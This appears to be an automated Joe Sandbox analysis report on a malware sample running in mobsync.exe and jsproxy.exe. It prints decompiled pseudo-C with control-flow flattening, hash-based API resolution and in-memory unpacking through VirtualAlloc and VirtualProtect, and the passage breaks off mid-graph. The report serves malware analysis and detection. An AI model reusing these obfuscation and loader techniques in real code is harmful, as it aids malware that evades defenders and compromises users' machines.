                                                                                control_flow_graph 529 2c30a0-2c30b6 530 2c30ba-2c30bf 529->530 531 2c30c0-2c30c5 530->531 532 2c30cb 531->532 533 2c3201-2c3206 531->533 534 2c31ed-2c31f1 532->534 535 2c30d1-2c30d6 532->535 536 2c3208-2c320d 533->536 537 2c3245-2c324c 533->537 538 2c32f6-2c3300 534->538 539 2c31f7-2c31fc 534->539 540 2c30dc-2c30e1 535->540 541 2c31da-2c31e8 535->541 542 2c32ab-2c32b3 536->542 543 2c3213-2c3218 536->543 544 2c324e-2c3264 call 2c3f00 call 2c3e60 537->544 545 2c3269-2c3274 537->545 539->531 546 2c30e7-2c30ec 540->546 547 2c31a0-2c31a8 540->547 541->531 550 2c32b5-2c32cd call 2c3f00 call 2c3e60 542->550 551 2c32d3-2c32f3 542->551 548 2c322d-2c3232 543->548 549 2c321a-2c3228 call 2c3d00 543->549 544->545 562 2c3276-2c328c call 2c3f00 call 2c3e60 545->562 563 2c3291-2c329f RtlAllocateHeap 545->563 546->548 554 2c30f2-2c319b 546->554 556 2c31c8-2c31d5 547->556 557 2c31aa-2c31c2 call 2c3f00 call 2c3e60 547->557 548->531 558 2c3238-2c3242 548->558 549->530 550->551 551->538 554->530 556->530 557->556 562->563 563->538 570 2c32a1-2c32a6 563->570 570->530
                                                                                C-Code - Quality: 71%
                                                                                			E002C30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x2ce1cc;
										if(_t95 == 0) {
											_t95 = E002C3E60(_t93, E002C3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x2ce1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x2ce494;
							if(_t62 == 0) {
								_t62 = E002C3E60(_t93, E002C3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x2ce494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x2cdd18 == 0) {
								 *0x2cdd18 = E002C3E60(_t93, E002C3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x2ce43c;
								if(_t116 == 0) {
									_t116 = E002C3E60(_t93, E002C3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x2ce43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E002C3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x002c30a2
                                                                                0x002c30a6
                                                                                0x002c30ac
                                                                                0x002c30b1
                                                                                0x002c30b6
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x002c30c0
                                                                                0x002c30c0
                                                                                0x002c30c0
                                                                                0x002c30c0
                                                                                0x002c30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c30cb
                                                                                0x002c31f1
                                                                                0x002c32f9
                                                                                0x002c3300
                                                                                0x002c31f7
                                                                                0x002c31f7
                                                                                0x00000000
                                                                                0x002c31f7
                                                                                0x002c30d1
                                                                                0x002c30d6
                                                                                0x002c31e5
                                                                                0x00000000
                                                                                0x002c30dc
                                                                                0x002c30e1
                                                                                0x002c31a0
                                                                                0x002c31a8
                                                                                0x002c31c0
                                                                                0x002c31c2
                                                                                0x002c31c2
                                                                                0x002c31ce
                                                                                0x002c31d0
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x00000000
                                                                                0x002c30ba
                                                                                0x002c30e7
                                                                                0x002c30ec
                                                                                0x00000000
                                                                                0x002c30f2
                                                                                0x002c30f2
                                                                                0x002c310d
                                                                                0x002c3111
                                                                                0x002c311f
                                                                                0x002c3123
                                                                                0x002c3130
                                                                                0x002c3139
                                                                                0x002c3147
                                                                                0x002c314b
                                                                                0x002c3153
                                                                                0x002c315b
                                                                                0x002c3175
                                                                                0x002c317f
                                                                                0x002c3187
                                                                                0x002c318b
                                                                                0x002c3193
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x00000000
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x002c30ec
                                                                                0x002c30e1
                                                                                0x002c30d6
                                                                                0x00000000
                                                                                0x002c30cb
                                                                                0x002c3206
                                                                                0x002c3245
                                                                                0x002c324c
                                                                                0x002c325f
                                                                                0x002c3264
                                                                                0x002c3264
                                                                                0x002c326b
                                                                                0x002c3274
                                                                                0x002c328c
                                                                                0x002c328c
                                                                                0x002c3299
                                                                                0x002c329b
                                                                                0x002c329f
                                                                                0x00000000
                                                                                0x002c32a1
                                                                                0x002c32a1
                                                                                0x00000000
                                                                                0x002c32a1
                                                                                0x002c3208
                                                                                0x002c320d
                                                                                0x002c32ab
                                                                                0x002c32b3
                                                                                0x002c32cb
                                                                                0x002c32cd
                                                                                0x002c32cd
                                                                                0x002c32e4
                                                                                0x002c32e6
                                                                                0x002c32ed
                                                                                0x002c32f0
                                                                                0x002c32f3
                                                                                0x00000000
                                                                                0x002c3213
                                                                                0x002c3218
                                                                                0x00000000
                                                                                0x002c321a
                                                                                0x002c3221
                                                                                0x002c3223
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x00000000
                                                                                0x002c30ba
                                                                                0x002c30ba
                                                                                0x002c3218
                                                                                0x002c320d
                                                                                0x00000000
                                                                                0x002c322d
                                                                                0x002c322d
                                                                                0x002c3242
                                                                                0x00000000
                                                                                0x002c3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 002C3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 5cb8cf3e586d37112c9cc1cf6265caa569a8208990f22b2a82020a125c256a2f
                                                                                • Instruction ID: fb5d5ff7a40001bc92401eff58df6fa188185c18cd127c8ff878127e3bc161da
                                                                                • Opcode Fuzzy Hash: 5cb8cf3e586d37112c9cc1cf6265caa569a8208990f22b2a82020a125c256a2f
                                                                                • Instruction Fuzzy Hash: E851C371A183028BCB18DF6C9485A6ABBE6EBD4304F208E1EE451C7351DB71DE598BD2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 580 2c7080-2c7092 call 2c34c0 583 2c70af-2c70c3 LoadLibraryW 580->583 584 2c7094-2c70aa call 2c3f00 call 2c3e60 580->584 586 2c70c5-2c70db call 2c3f00 call 2c3e60 583->586 587 2c70e0-2c70eb 583->587 584->583 586->587 594 2c70ed-2c7103 call 2c3f00 call 2c3e60 587->594 595 2c7108-2c7110 587->595 594->595
                                                                                C-Code - Quality: 75%
                                                                                			E002C7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E002C34C0(__ecx);
				if( *0x2cdd1c == 0) {
					 *0x2cdd1c = E002C3E60(__ebx, E002C3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x2ce548; // 0x617e20
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x2ce494;
				if(_t7 == 0) {
					_t7 = E002C3E60(_t15, E002C3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x2ce494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x2cdf30;
				if(_t9 == 0) {
					_t9 = E002C3E60(_t15, E002C3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x2cdf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x002c7080
                                                                                0x002c7082
                                                                                0x002c7089
                                                                                0x002c7092
                                                                                0x002c70aa
                                                                                0x002c70aa
                                                                                0x002c70b0
                                                                                0x002c70b2
                                                                                0x002c70b8
                                                                                0x002c70bc
                                                                                0x002c70c3
                                                                                0x002c70d6
                                                                                0x002c70db
                                                                                0x002c70db
                                                                                0x002c70e2
                                                                                0x002c70e4
                                                                                0x002c70eb
                                                                                0x002c70fe
                                                                                0x002c7103
                                                                                0x002c7103
                                                                                0x002c7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002C721D,002C68AC), ref: 002C70B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: ~a
                                                                                • API String ID: 1029625771-1275435588
                                                                                • Opcode ID: 09d85ac40512fe577d37182663165aee5bbb1fa9961fa882c479b9724a5116d8
                                                                                • Instruction ID: 5f43754d67db1d2a5c35ebf3a563eb7ff74458cd3db0b4de3f8b5fbb6acabc7b
                                                                                • Opcode Fuzzy Hash: 09d85ac40512fe577d37182663165aee5bbb1fa9961fa882c479b9724a5116d8
                                                                                • Instruction Fuzzy Hash: 0E01A7307342110B9B14EF79BC44F6B26ABAFE0654710493DE019D7316EE34CD118B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B0580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 2b0580-2b05be call 2b0ed0 606 2b05d2-2b05da 603->606 607 2b05c0-2b05cf 603->607 608 2b05e0-2b05e3 606->608 609 2b06e7-2b06ef 606->609 608->609 610 2b05e9-2b05eb 608->610 610->609 611 2b05f1-2b05fc 610->611 611->609 613 2b0602-2b0607 611->613 614 2b06d8-2b06e4 613->614 615 2b060d-2b0629 call 2b1140 RtlMoveMemory 613->615 618 2b062b-2b0630 615->618 619 2b0654-2b0659 615->619 620 2b0643-2b0652 618->620 621 2b0632-2b0641 618->621 622 2b065b-2b066a 619->622 623 2b066c-2b0678 619->623 624 2b0679-2b0699 call 2b1140 620->624 621->624 622->624 623->624 624->609 627 2b069b-2b06a3 VirtualProtect 624->627 628 2b06c6-2b06d5 627->628 629 2b06a5-2b06a8 627->629 629->609 630 2b06aa-2b06ad 629->630 630->609 631 2b06af-2b06b1 630->631 631->615 632 2b06b7-2b06c3 631->632
                                                                                APIs
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002B0F08
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002B0F3E
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002B0F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002B061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 002B069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: 326e0622796e3e5895e585d19da356c072233f574b7717615a5848039539ec17
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: B93178B367420617E3259A29DCC5BEBA3C8DBD13D0F48083AF904C2280E52ED478C665
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 633 2c5ce0-2c5cec call 2c65e0 636 2c5cee-2c5d04 call 2c3f00 call 2c3e60 633->636 637 2c5d09-2c5d0d ExitProcess 633->637 636->637
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E002C65E0();
				if( *0x2cddb8 == 0) {
					 *0x2cddb8 = E002C3E60(_t5, E002C3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x002c5ce0
                                                                                0x002c5cec
                                                                                0x002c5d04
                                                                                0x002c5d04
                                                                                0x002c5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 002C5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: c0ee3717096e81904e6cf512c817eaa2bc17937ca4a2500578a6a76baac9db7f
                                                                                • Instruction ID: d101aacd49640ee898c0e12bd379a631d9ded1f185f93a4c2a149dd19dadf7f3
                                                                                • Opcode Fuzzy Hash: c0ee3717096e81904e6cf512c817eaa2bc17937ca4a2500578a6a76baac9db7f
                                                                                • Instruction Fuzzy Hash: 61D01271B2421557DF44EBB56849F6A259A4FE0748F10892DF012CB296FE24CDB0BB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B0AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 642 2b0ad0-2b0b31 call 2b0ed0 645 2b0b33-2b0b42 642->645 646 2b0b47-2b0b4d 642->646 647 2b0d40 645->647 648 2b0b5f-2b0b7b 646->648 649 2b0b4f-2b0b54 646->649 651 2b0b7d-2b0b8e 648->651 652 2b0b90 648->652 649->648 653 2b0b96-2b0b9c 651->653 652->653 655 2b0bae-2b0bca 653->655 656 2b0b9e-2b0ba3 653->656 658 2b0bcc-2b0bd4 655->658 659 2b0bd7-2b0c21 VirtualAlloc 655->659 656->655 658->659 663 2b0d1a-2b0d24 659->663 664 2b0c27-2b0c2e 659->664 663->647 665 2b0c30-2b0c3f 664->665 666 2b0c44-2b0c4b 664->666 665->647 667 2b0c5d-2b0c79 666->667 668 2b0c4d-2b0c52 666->668 670 2b0c7b-2b0c83 667->670 671 2b0c86-2b0c8d 667->671 668->667 670->671 672 2b0c9f-2b0cbb 671->672 673 2b0c8f-2b0c94 671->673 675 2b0cc8-2b0cfa VirtualAlloc 672->675 676 2b0cbd-2b0cc5 672->676 673->672 679 2b0d02-2b0d07 675->679 676->675 679->663 680 2b0d09-2b0d18 679->680 680->647
                                                                                APIs
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002B0F08
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002B0F3E
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002B0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 002B0BFF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 09134fc36c01d2e649d56dc3681cbb5959ac40b3290c102256144daad3324d4b
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 42511270A40218ABDB219F54CE86FEBB7B8EF54741F004195FA08B7190D7B8AD85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B0170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002B0F08
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002B0F3E
                                                                                  • Part of subcall function 002B0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002B0F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002B02F6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: 1f97af68e50f5d3398fe0f4b55c3aa76482e2726c92522449b41642681017f4f
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: BA514AB1910268ABDB20DF64DD88BDEB778EF88740F0045D9F509B7250DB74AA85CF94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 002B0010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 9d2ecc42c176748ec7b918d2345896ea75f561fab333febd9c4e0ebb7e22a0bb
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: 45313D38E511289BCB04DB98CD80AEE7BB5FF4C340B508027D506737A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B06F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: c94da81b622a2143086e9a006c8eb8168fd938ee3691ad8a705d5884bdb01baf
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: AA5195B2A243015BD721DF2AD881BDBB3D89FD47D4F04492DF948E7241E635D9348B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002B08F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300923579.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2b0000_mobsync.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: dcaeea993974081562022dd8c2640cb26d4286966018faf960f9271bdec51c6d
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: 4C4129B16343025BC325DE29CCD5BEBB2D9ABC4BD0F084D3EF644D6240D670E5288BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: jsproxy.exe PID: 2552 Parent PID: 2504 jsproxy.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1170
                                                                                Total number of Limit Nodes:13

                                                                                Graph

                                                                                execution_graph 6891 2a1928 6912 2a191f 6891->6912 6892 2a1bc6 6893 2a35c0 GetPEB 6892->6893 6895 2a1bd0 6893->6895 6894 2a1ba4 6896 2a1bf1 6895->6896 6897 2a3f00 GetPEB 6895->6897 6901 2a1c23 6896->6901 6902 2a3f00 GetPEB 6896->6902 6898 2a1be5 6897->6898 6899 2a3e60 GetPEB 6898->6899 6899->6896 6900 2a4e30 GetPEB 6900->6912 6904 2a1c4b 6901->6904 6906 2a3f00 GetPEB 6901->6906 6903 2a1c17 6902->6903 6905 2a3e60 GetPEB 6903->6905 6905->6901 6907 2a1c3f 6906->6907 6909 2a3e60 GetPEB 6907->6909 6908 2a3e60 GetPEB 6908->6912 6909->6904 6910 2a35c0 GetPEB 6910->6912 6911 2a3f00 GetPEB 6911->6912 6912->6892 6912->6894 6912->6900 6912->6908 6912->6910 6912->6911 7094 2a4869 7099 2a4870 7094->7099 7095 2a496e 7096 2a492c 7095->7096 7098 2a3f00 GetPEB 7095->7098 7097 2a3f00 GetPEB 7097->7099 7100 2a4981 7098->7100 7099->7095 7099->7096 7099->7097 7102 2a3e60 GetPEB 7099->7102 7101 2a3e60 GetPEB 7100->7101 7101->7096 7102->7099 5943 2a30a0 5951 2a30ba 5943->5951 5944 2a32ab 5945 2a3238 5944->5945 5953 2a3f00 GetPEB 5944->5953 5947 2a3291 RtlAllocateHeap 5947->5945 5947->5951 5948 2a3f00 GetPEB 5948->5951 5951->5944 5951->5945 5951->5947 5951->5948 5952 2a3e60 GetPEB 5951->5952 5952->5951 5954 2a32bf 5953->5954 5955 2a3e60 5954->5955 5956 2a3ebc 5955->5956 5957 2a3e9c 5955->5957 5956->5945 5957->5956 5958 2a3f00 GetPEB 5957->5958 5961 2a40f5 5957->5961 5959 2a40e9 5958->5959 5960 2a3e60 GetPEB 5959->5960 5960->5961 5962 2a3f00 GetPEB 5961->5962 5968 2a4126 5961->5968 5963 2a411a 5962->5963 5965 2a3e60 GetPEB 5963->5965 5964 2a3e60 GetPEB 5967 2a4157 5964->5967 5965->5968 5966 2a4138 5966->5945 5967->5945 5968->5964 5968->5966 5996 2a5ce0 6004 2a65e0 5996->6004 5998 2a5ce5 5999 2a5d09 ExitProcess 5998->5999 6000 2a3f00 GetPEB 5998->6000 6001 2a5cf8 6000->6001 6002 2a3e60 GetPEB 6001->6002 6003 2a5d04 6002->6003 6003->5999 6049 2a65fd 6004->6049 6007 2a706e 6347 2a8740 6007->6347 6009 2a68df 6009->5998 6010 2a6dcd 6322 2ab2e0 6010->6322 6012 2a7061 6338 2a8d40 6012->6338 6018 2a3f00 GetPEB 6040 2a6927 6018->6040 6020 2a6f27 GetTickCount 6020->6049 6027 2a7073 6027->5998 6029 2a3e60 GetPEB 6029->6040 6033 2a3f00 GetPEB 6033->6049 6034 2a4220 GetPEB 6034->6049 6035 2a7066 6035->5998 6040->6018 6040->6020 6040->6029 6044 2a6975 GetTickCount 6040->6044 6043 2a3e60 GetPEB 6043->6049 6044->6049 6048 2a4160 GetPEB 6048->6049 6049->6007 6049->6009 6049->6010 6049->6012 6049->6033 6049->6034 6049->6040 6049->6043 6049->6048 6050 2a8400 6049->6050 6056 2a7120 6049->6056 6077 2a8e80 6049->6077 6087 2a8970 6049->6087 6099 2a80a0 6049->6099 6113 2a9860 6049->6113 6129 2a9620 6049->6129 6138 2a12b0 6049->6138 6159 2aafe0 6049->6159 6164 2a8700 6049->6164 6170 2a6060 6049->6170 6191 2ab430 6049->6191 6198 2a9f30 6049->6198 6207 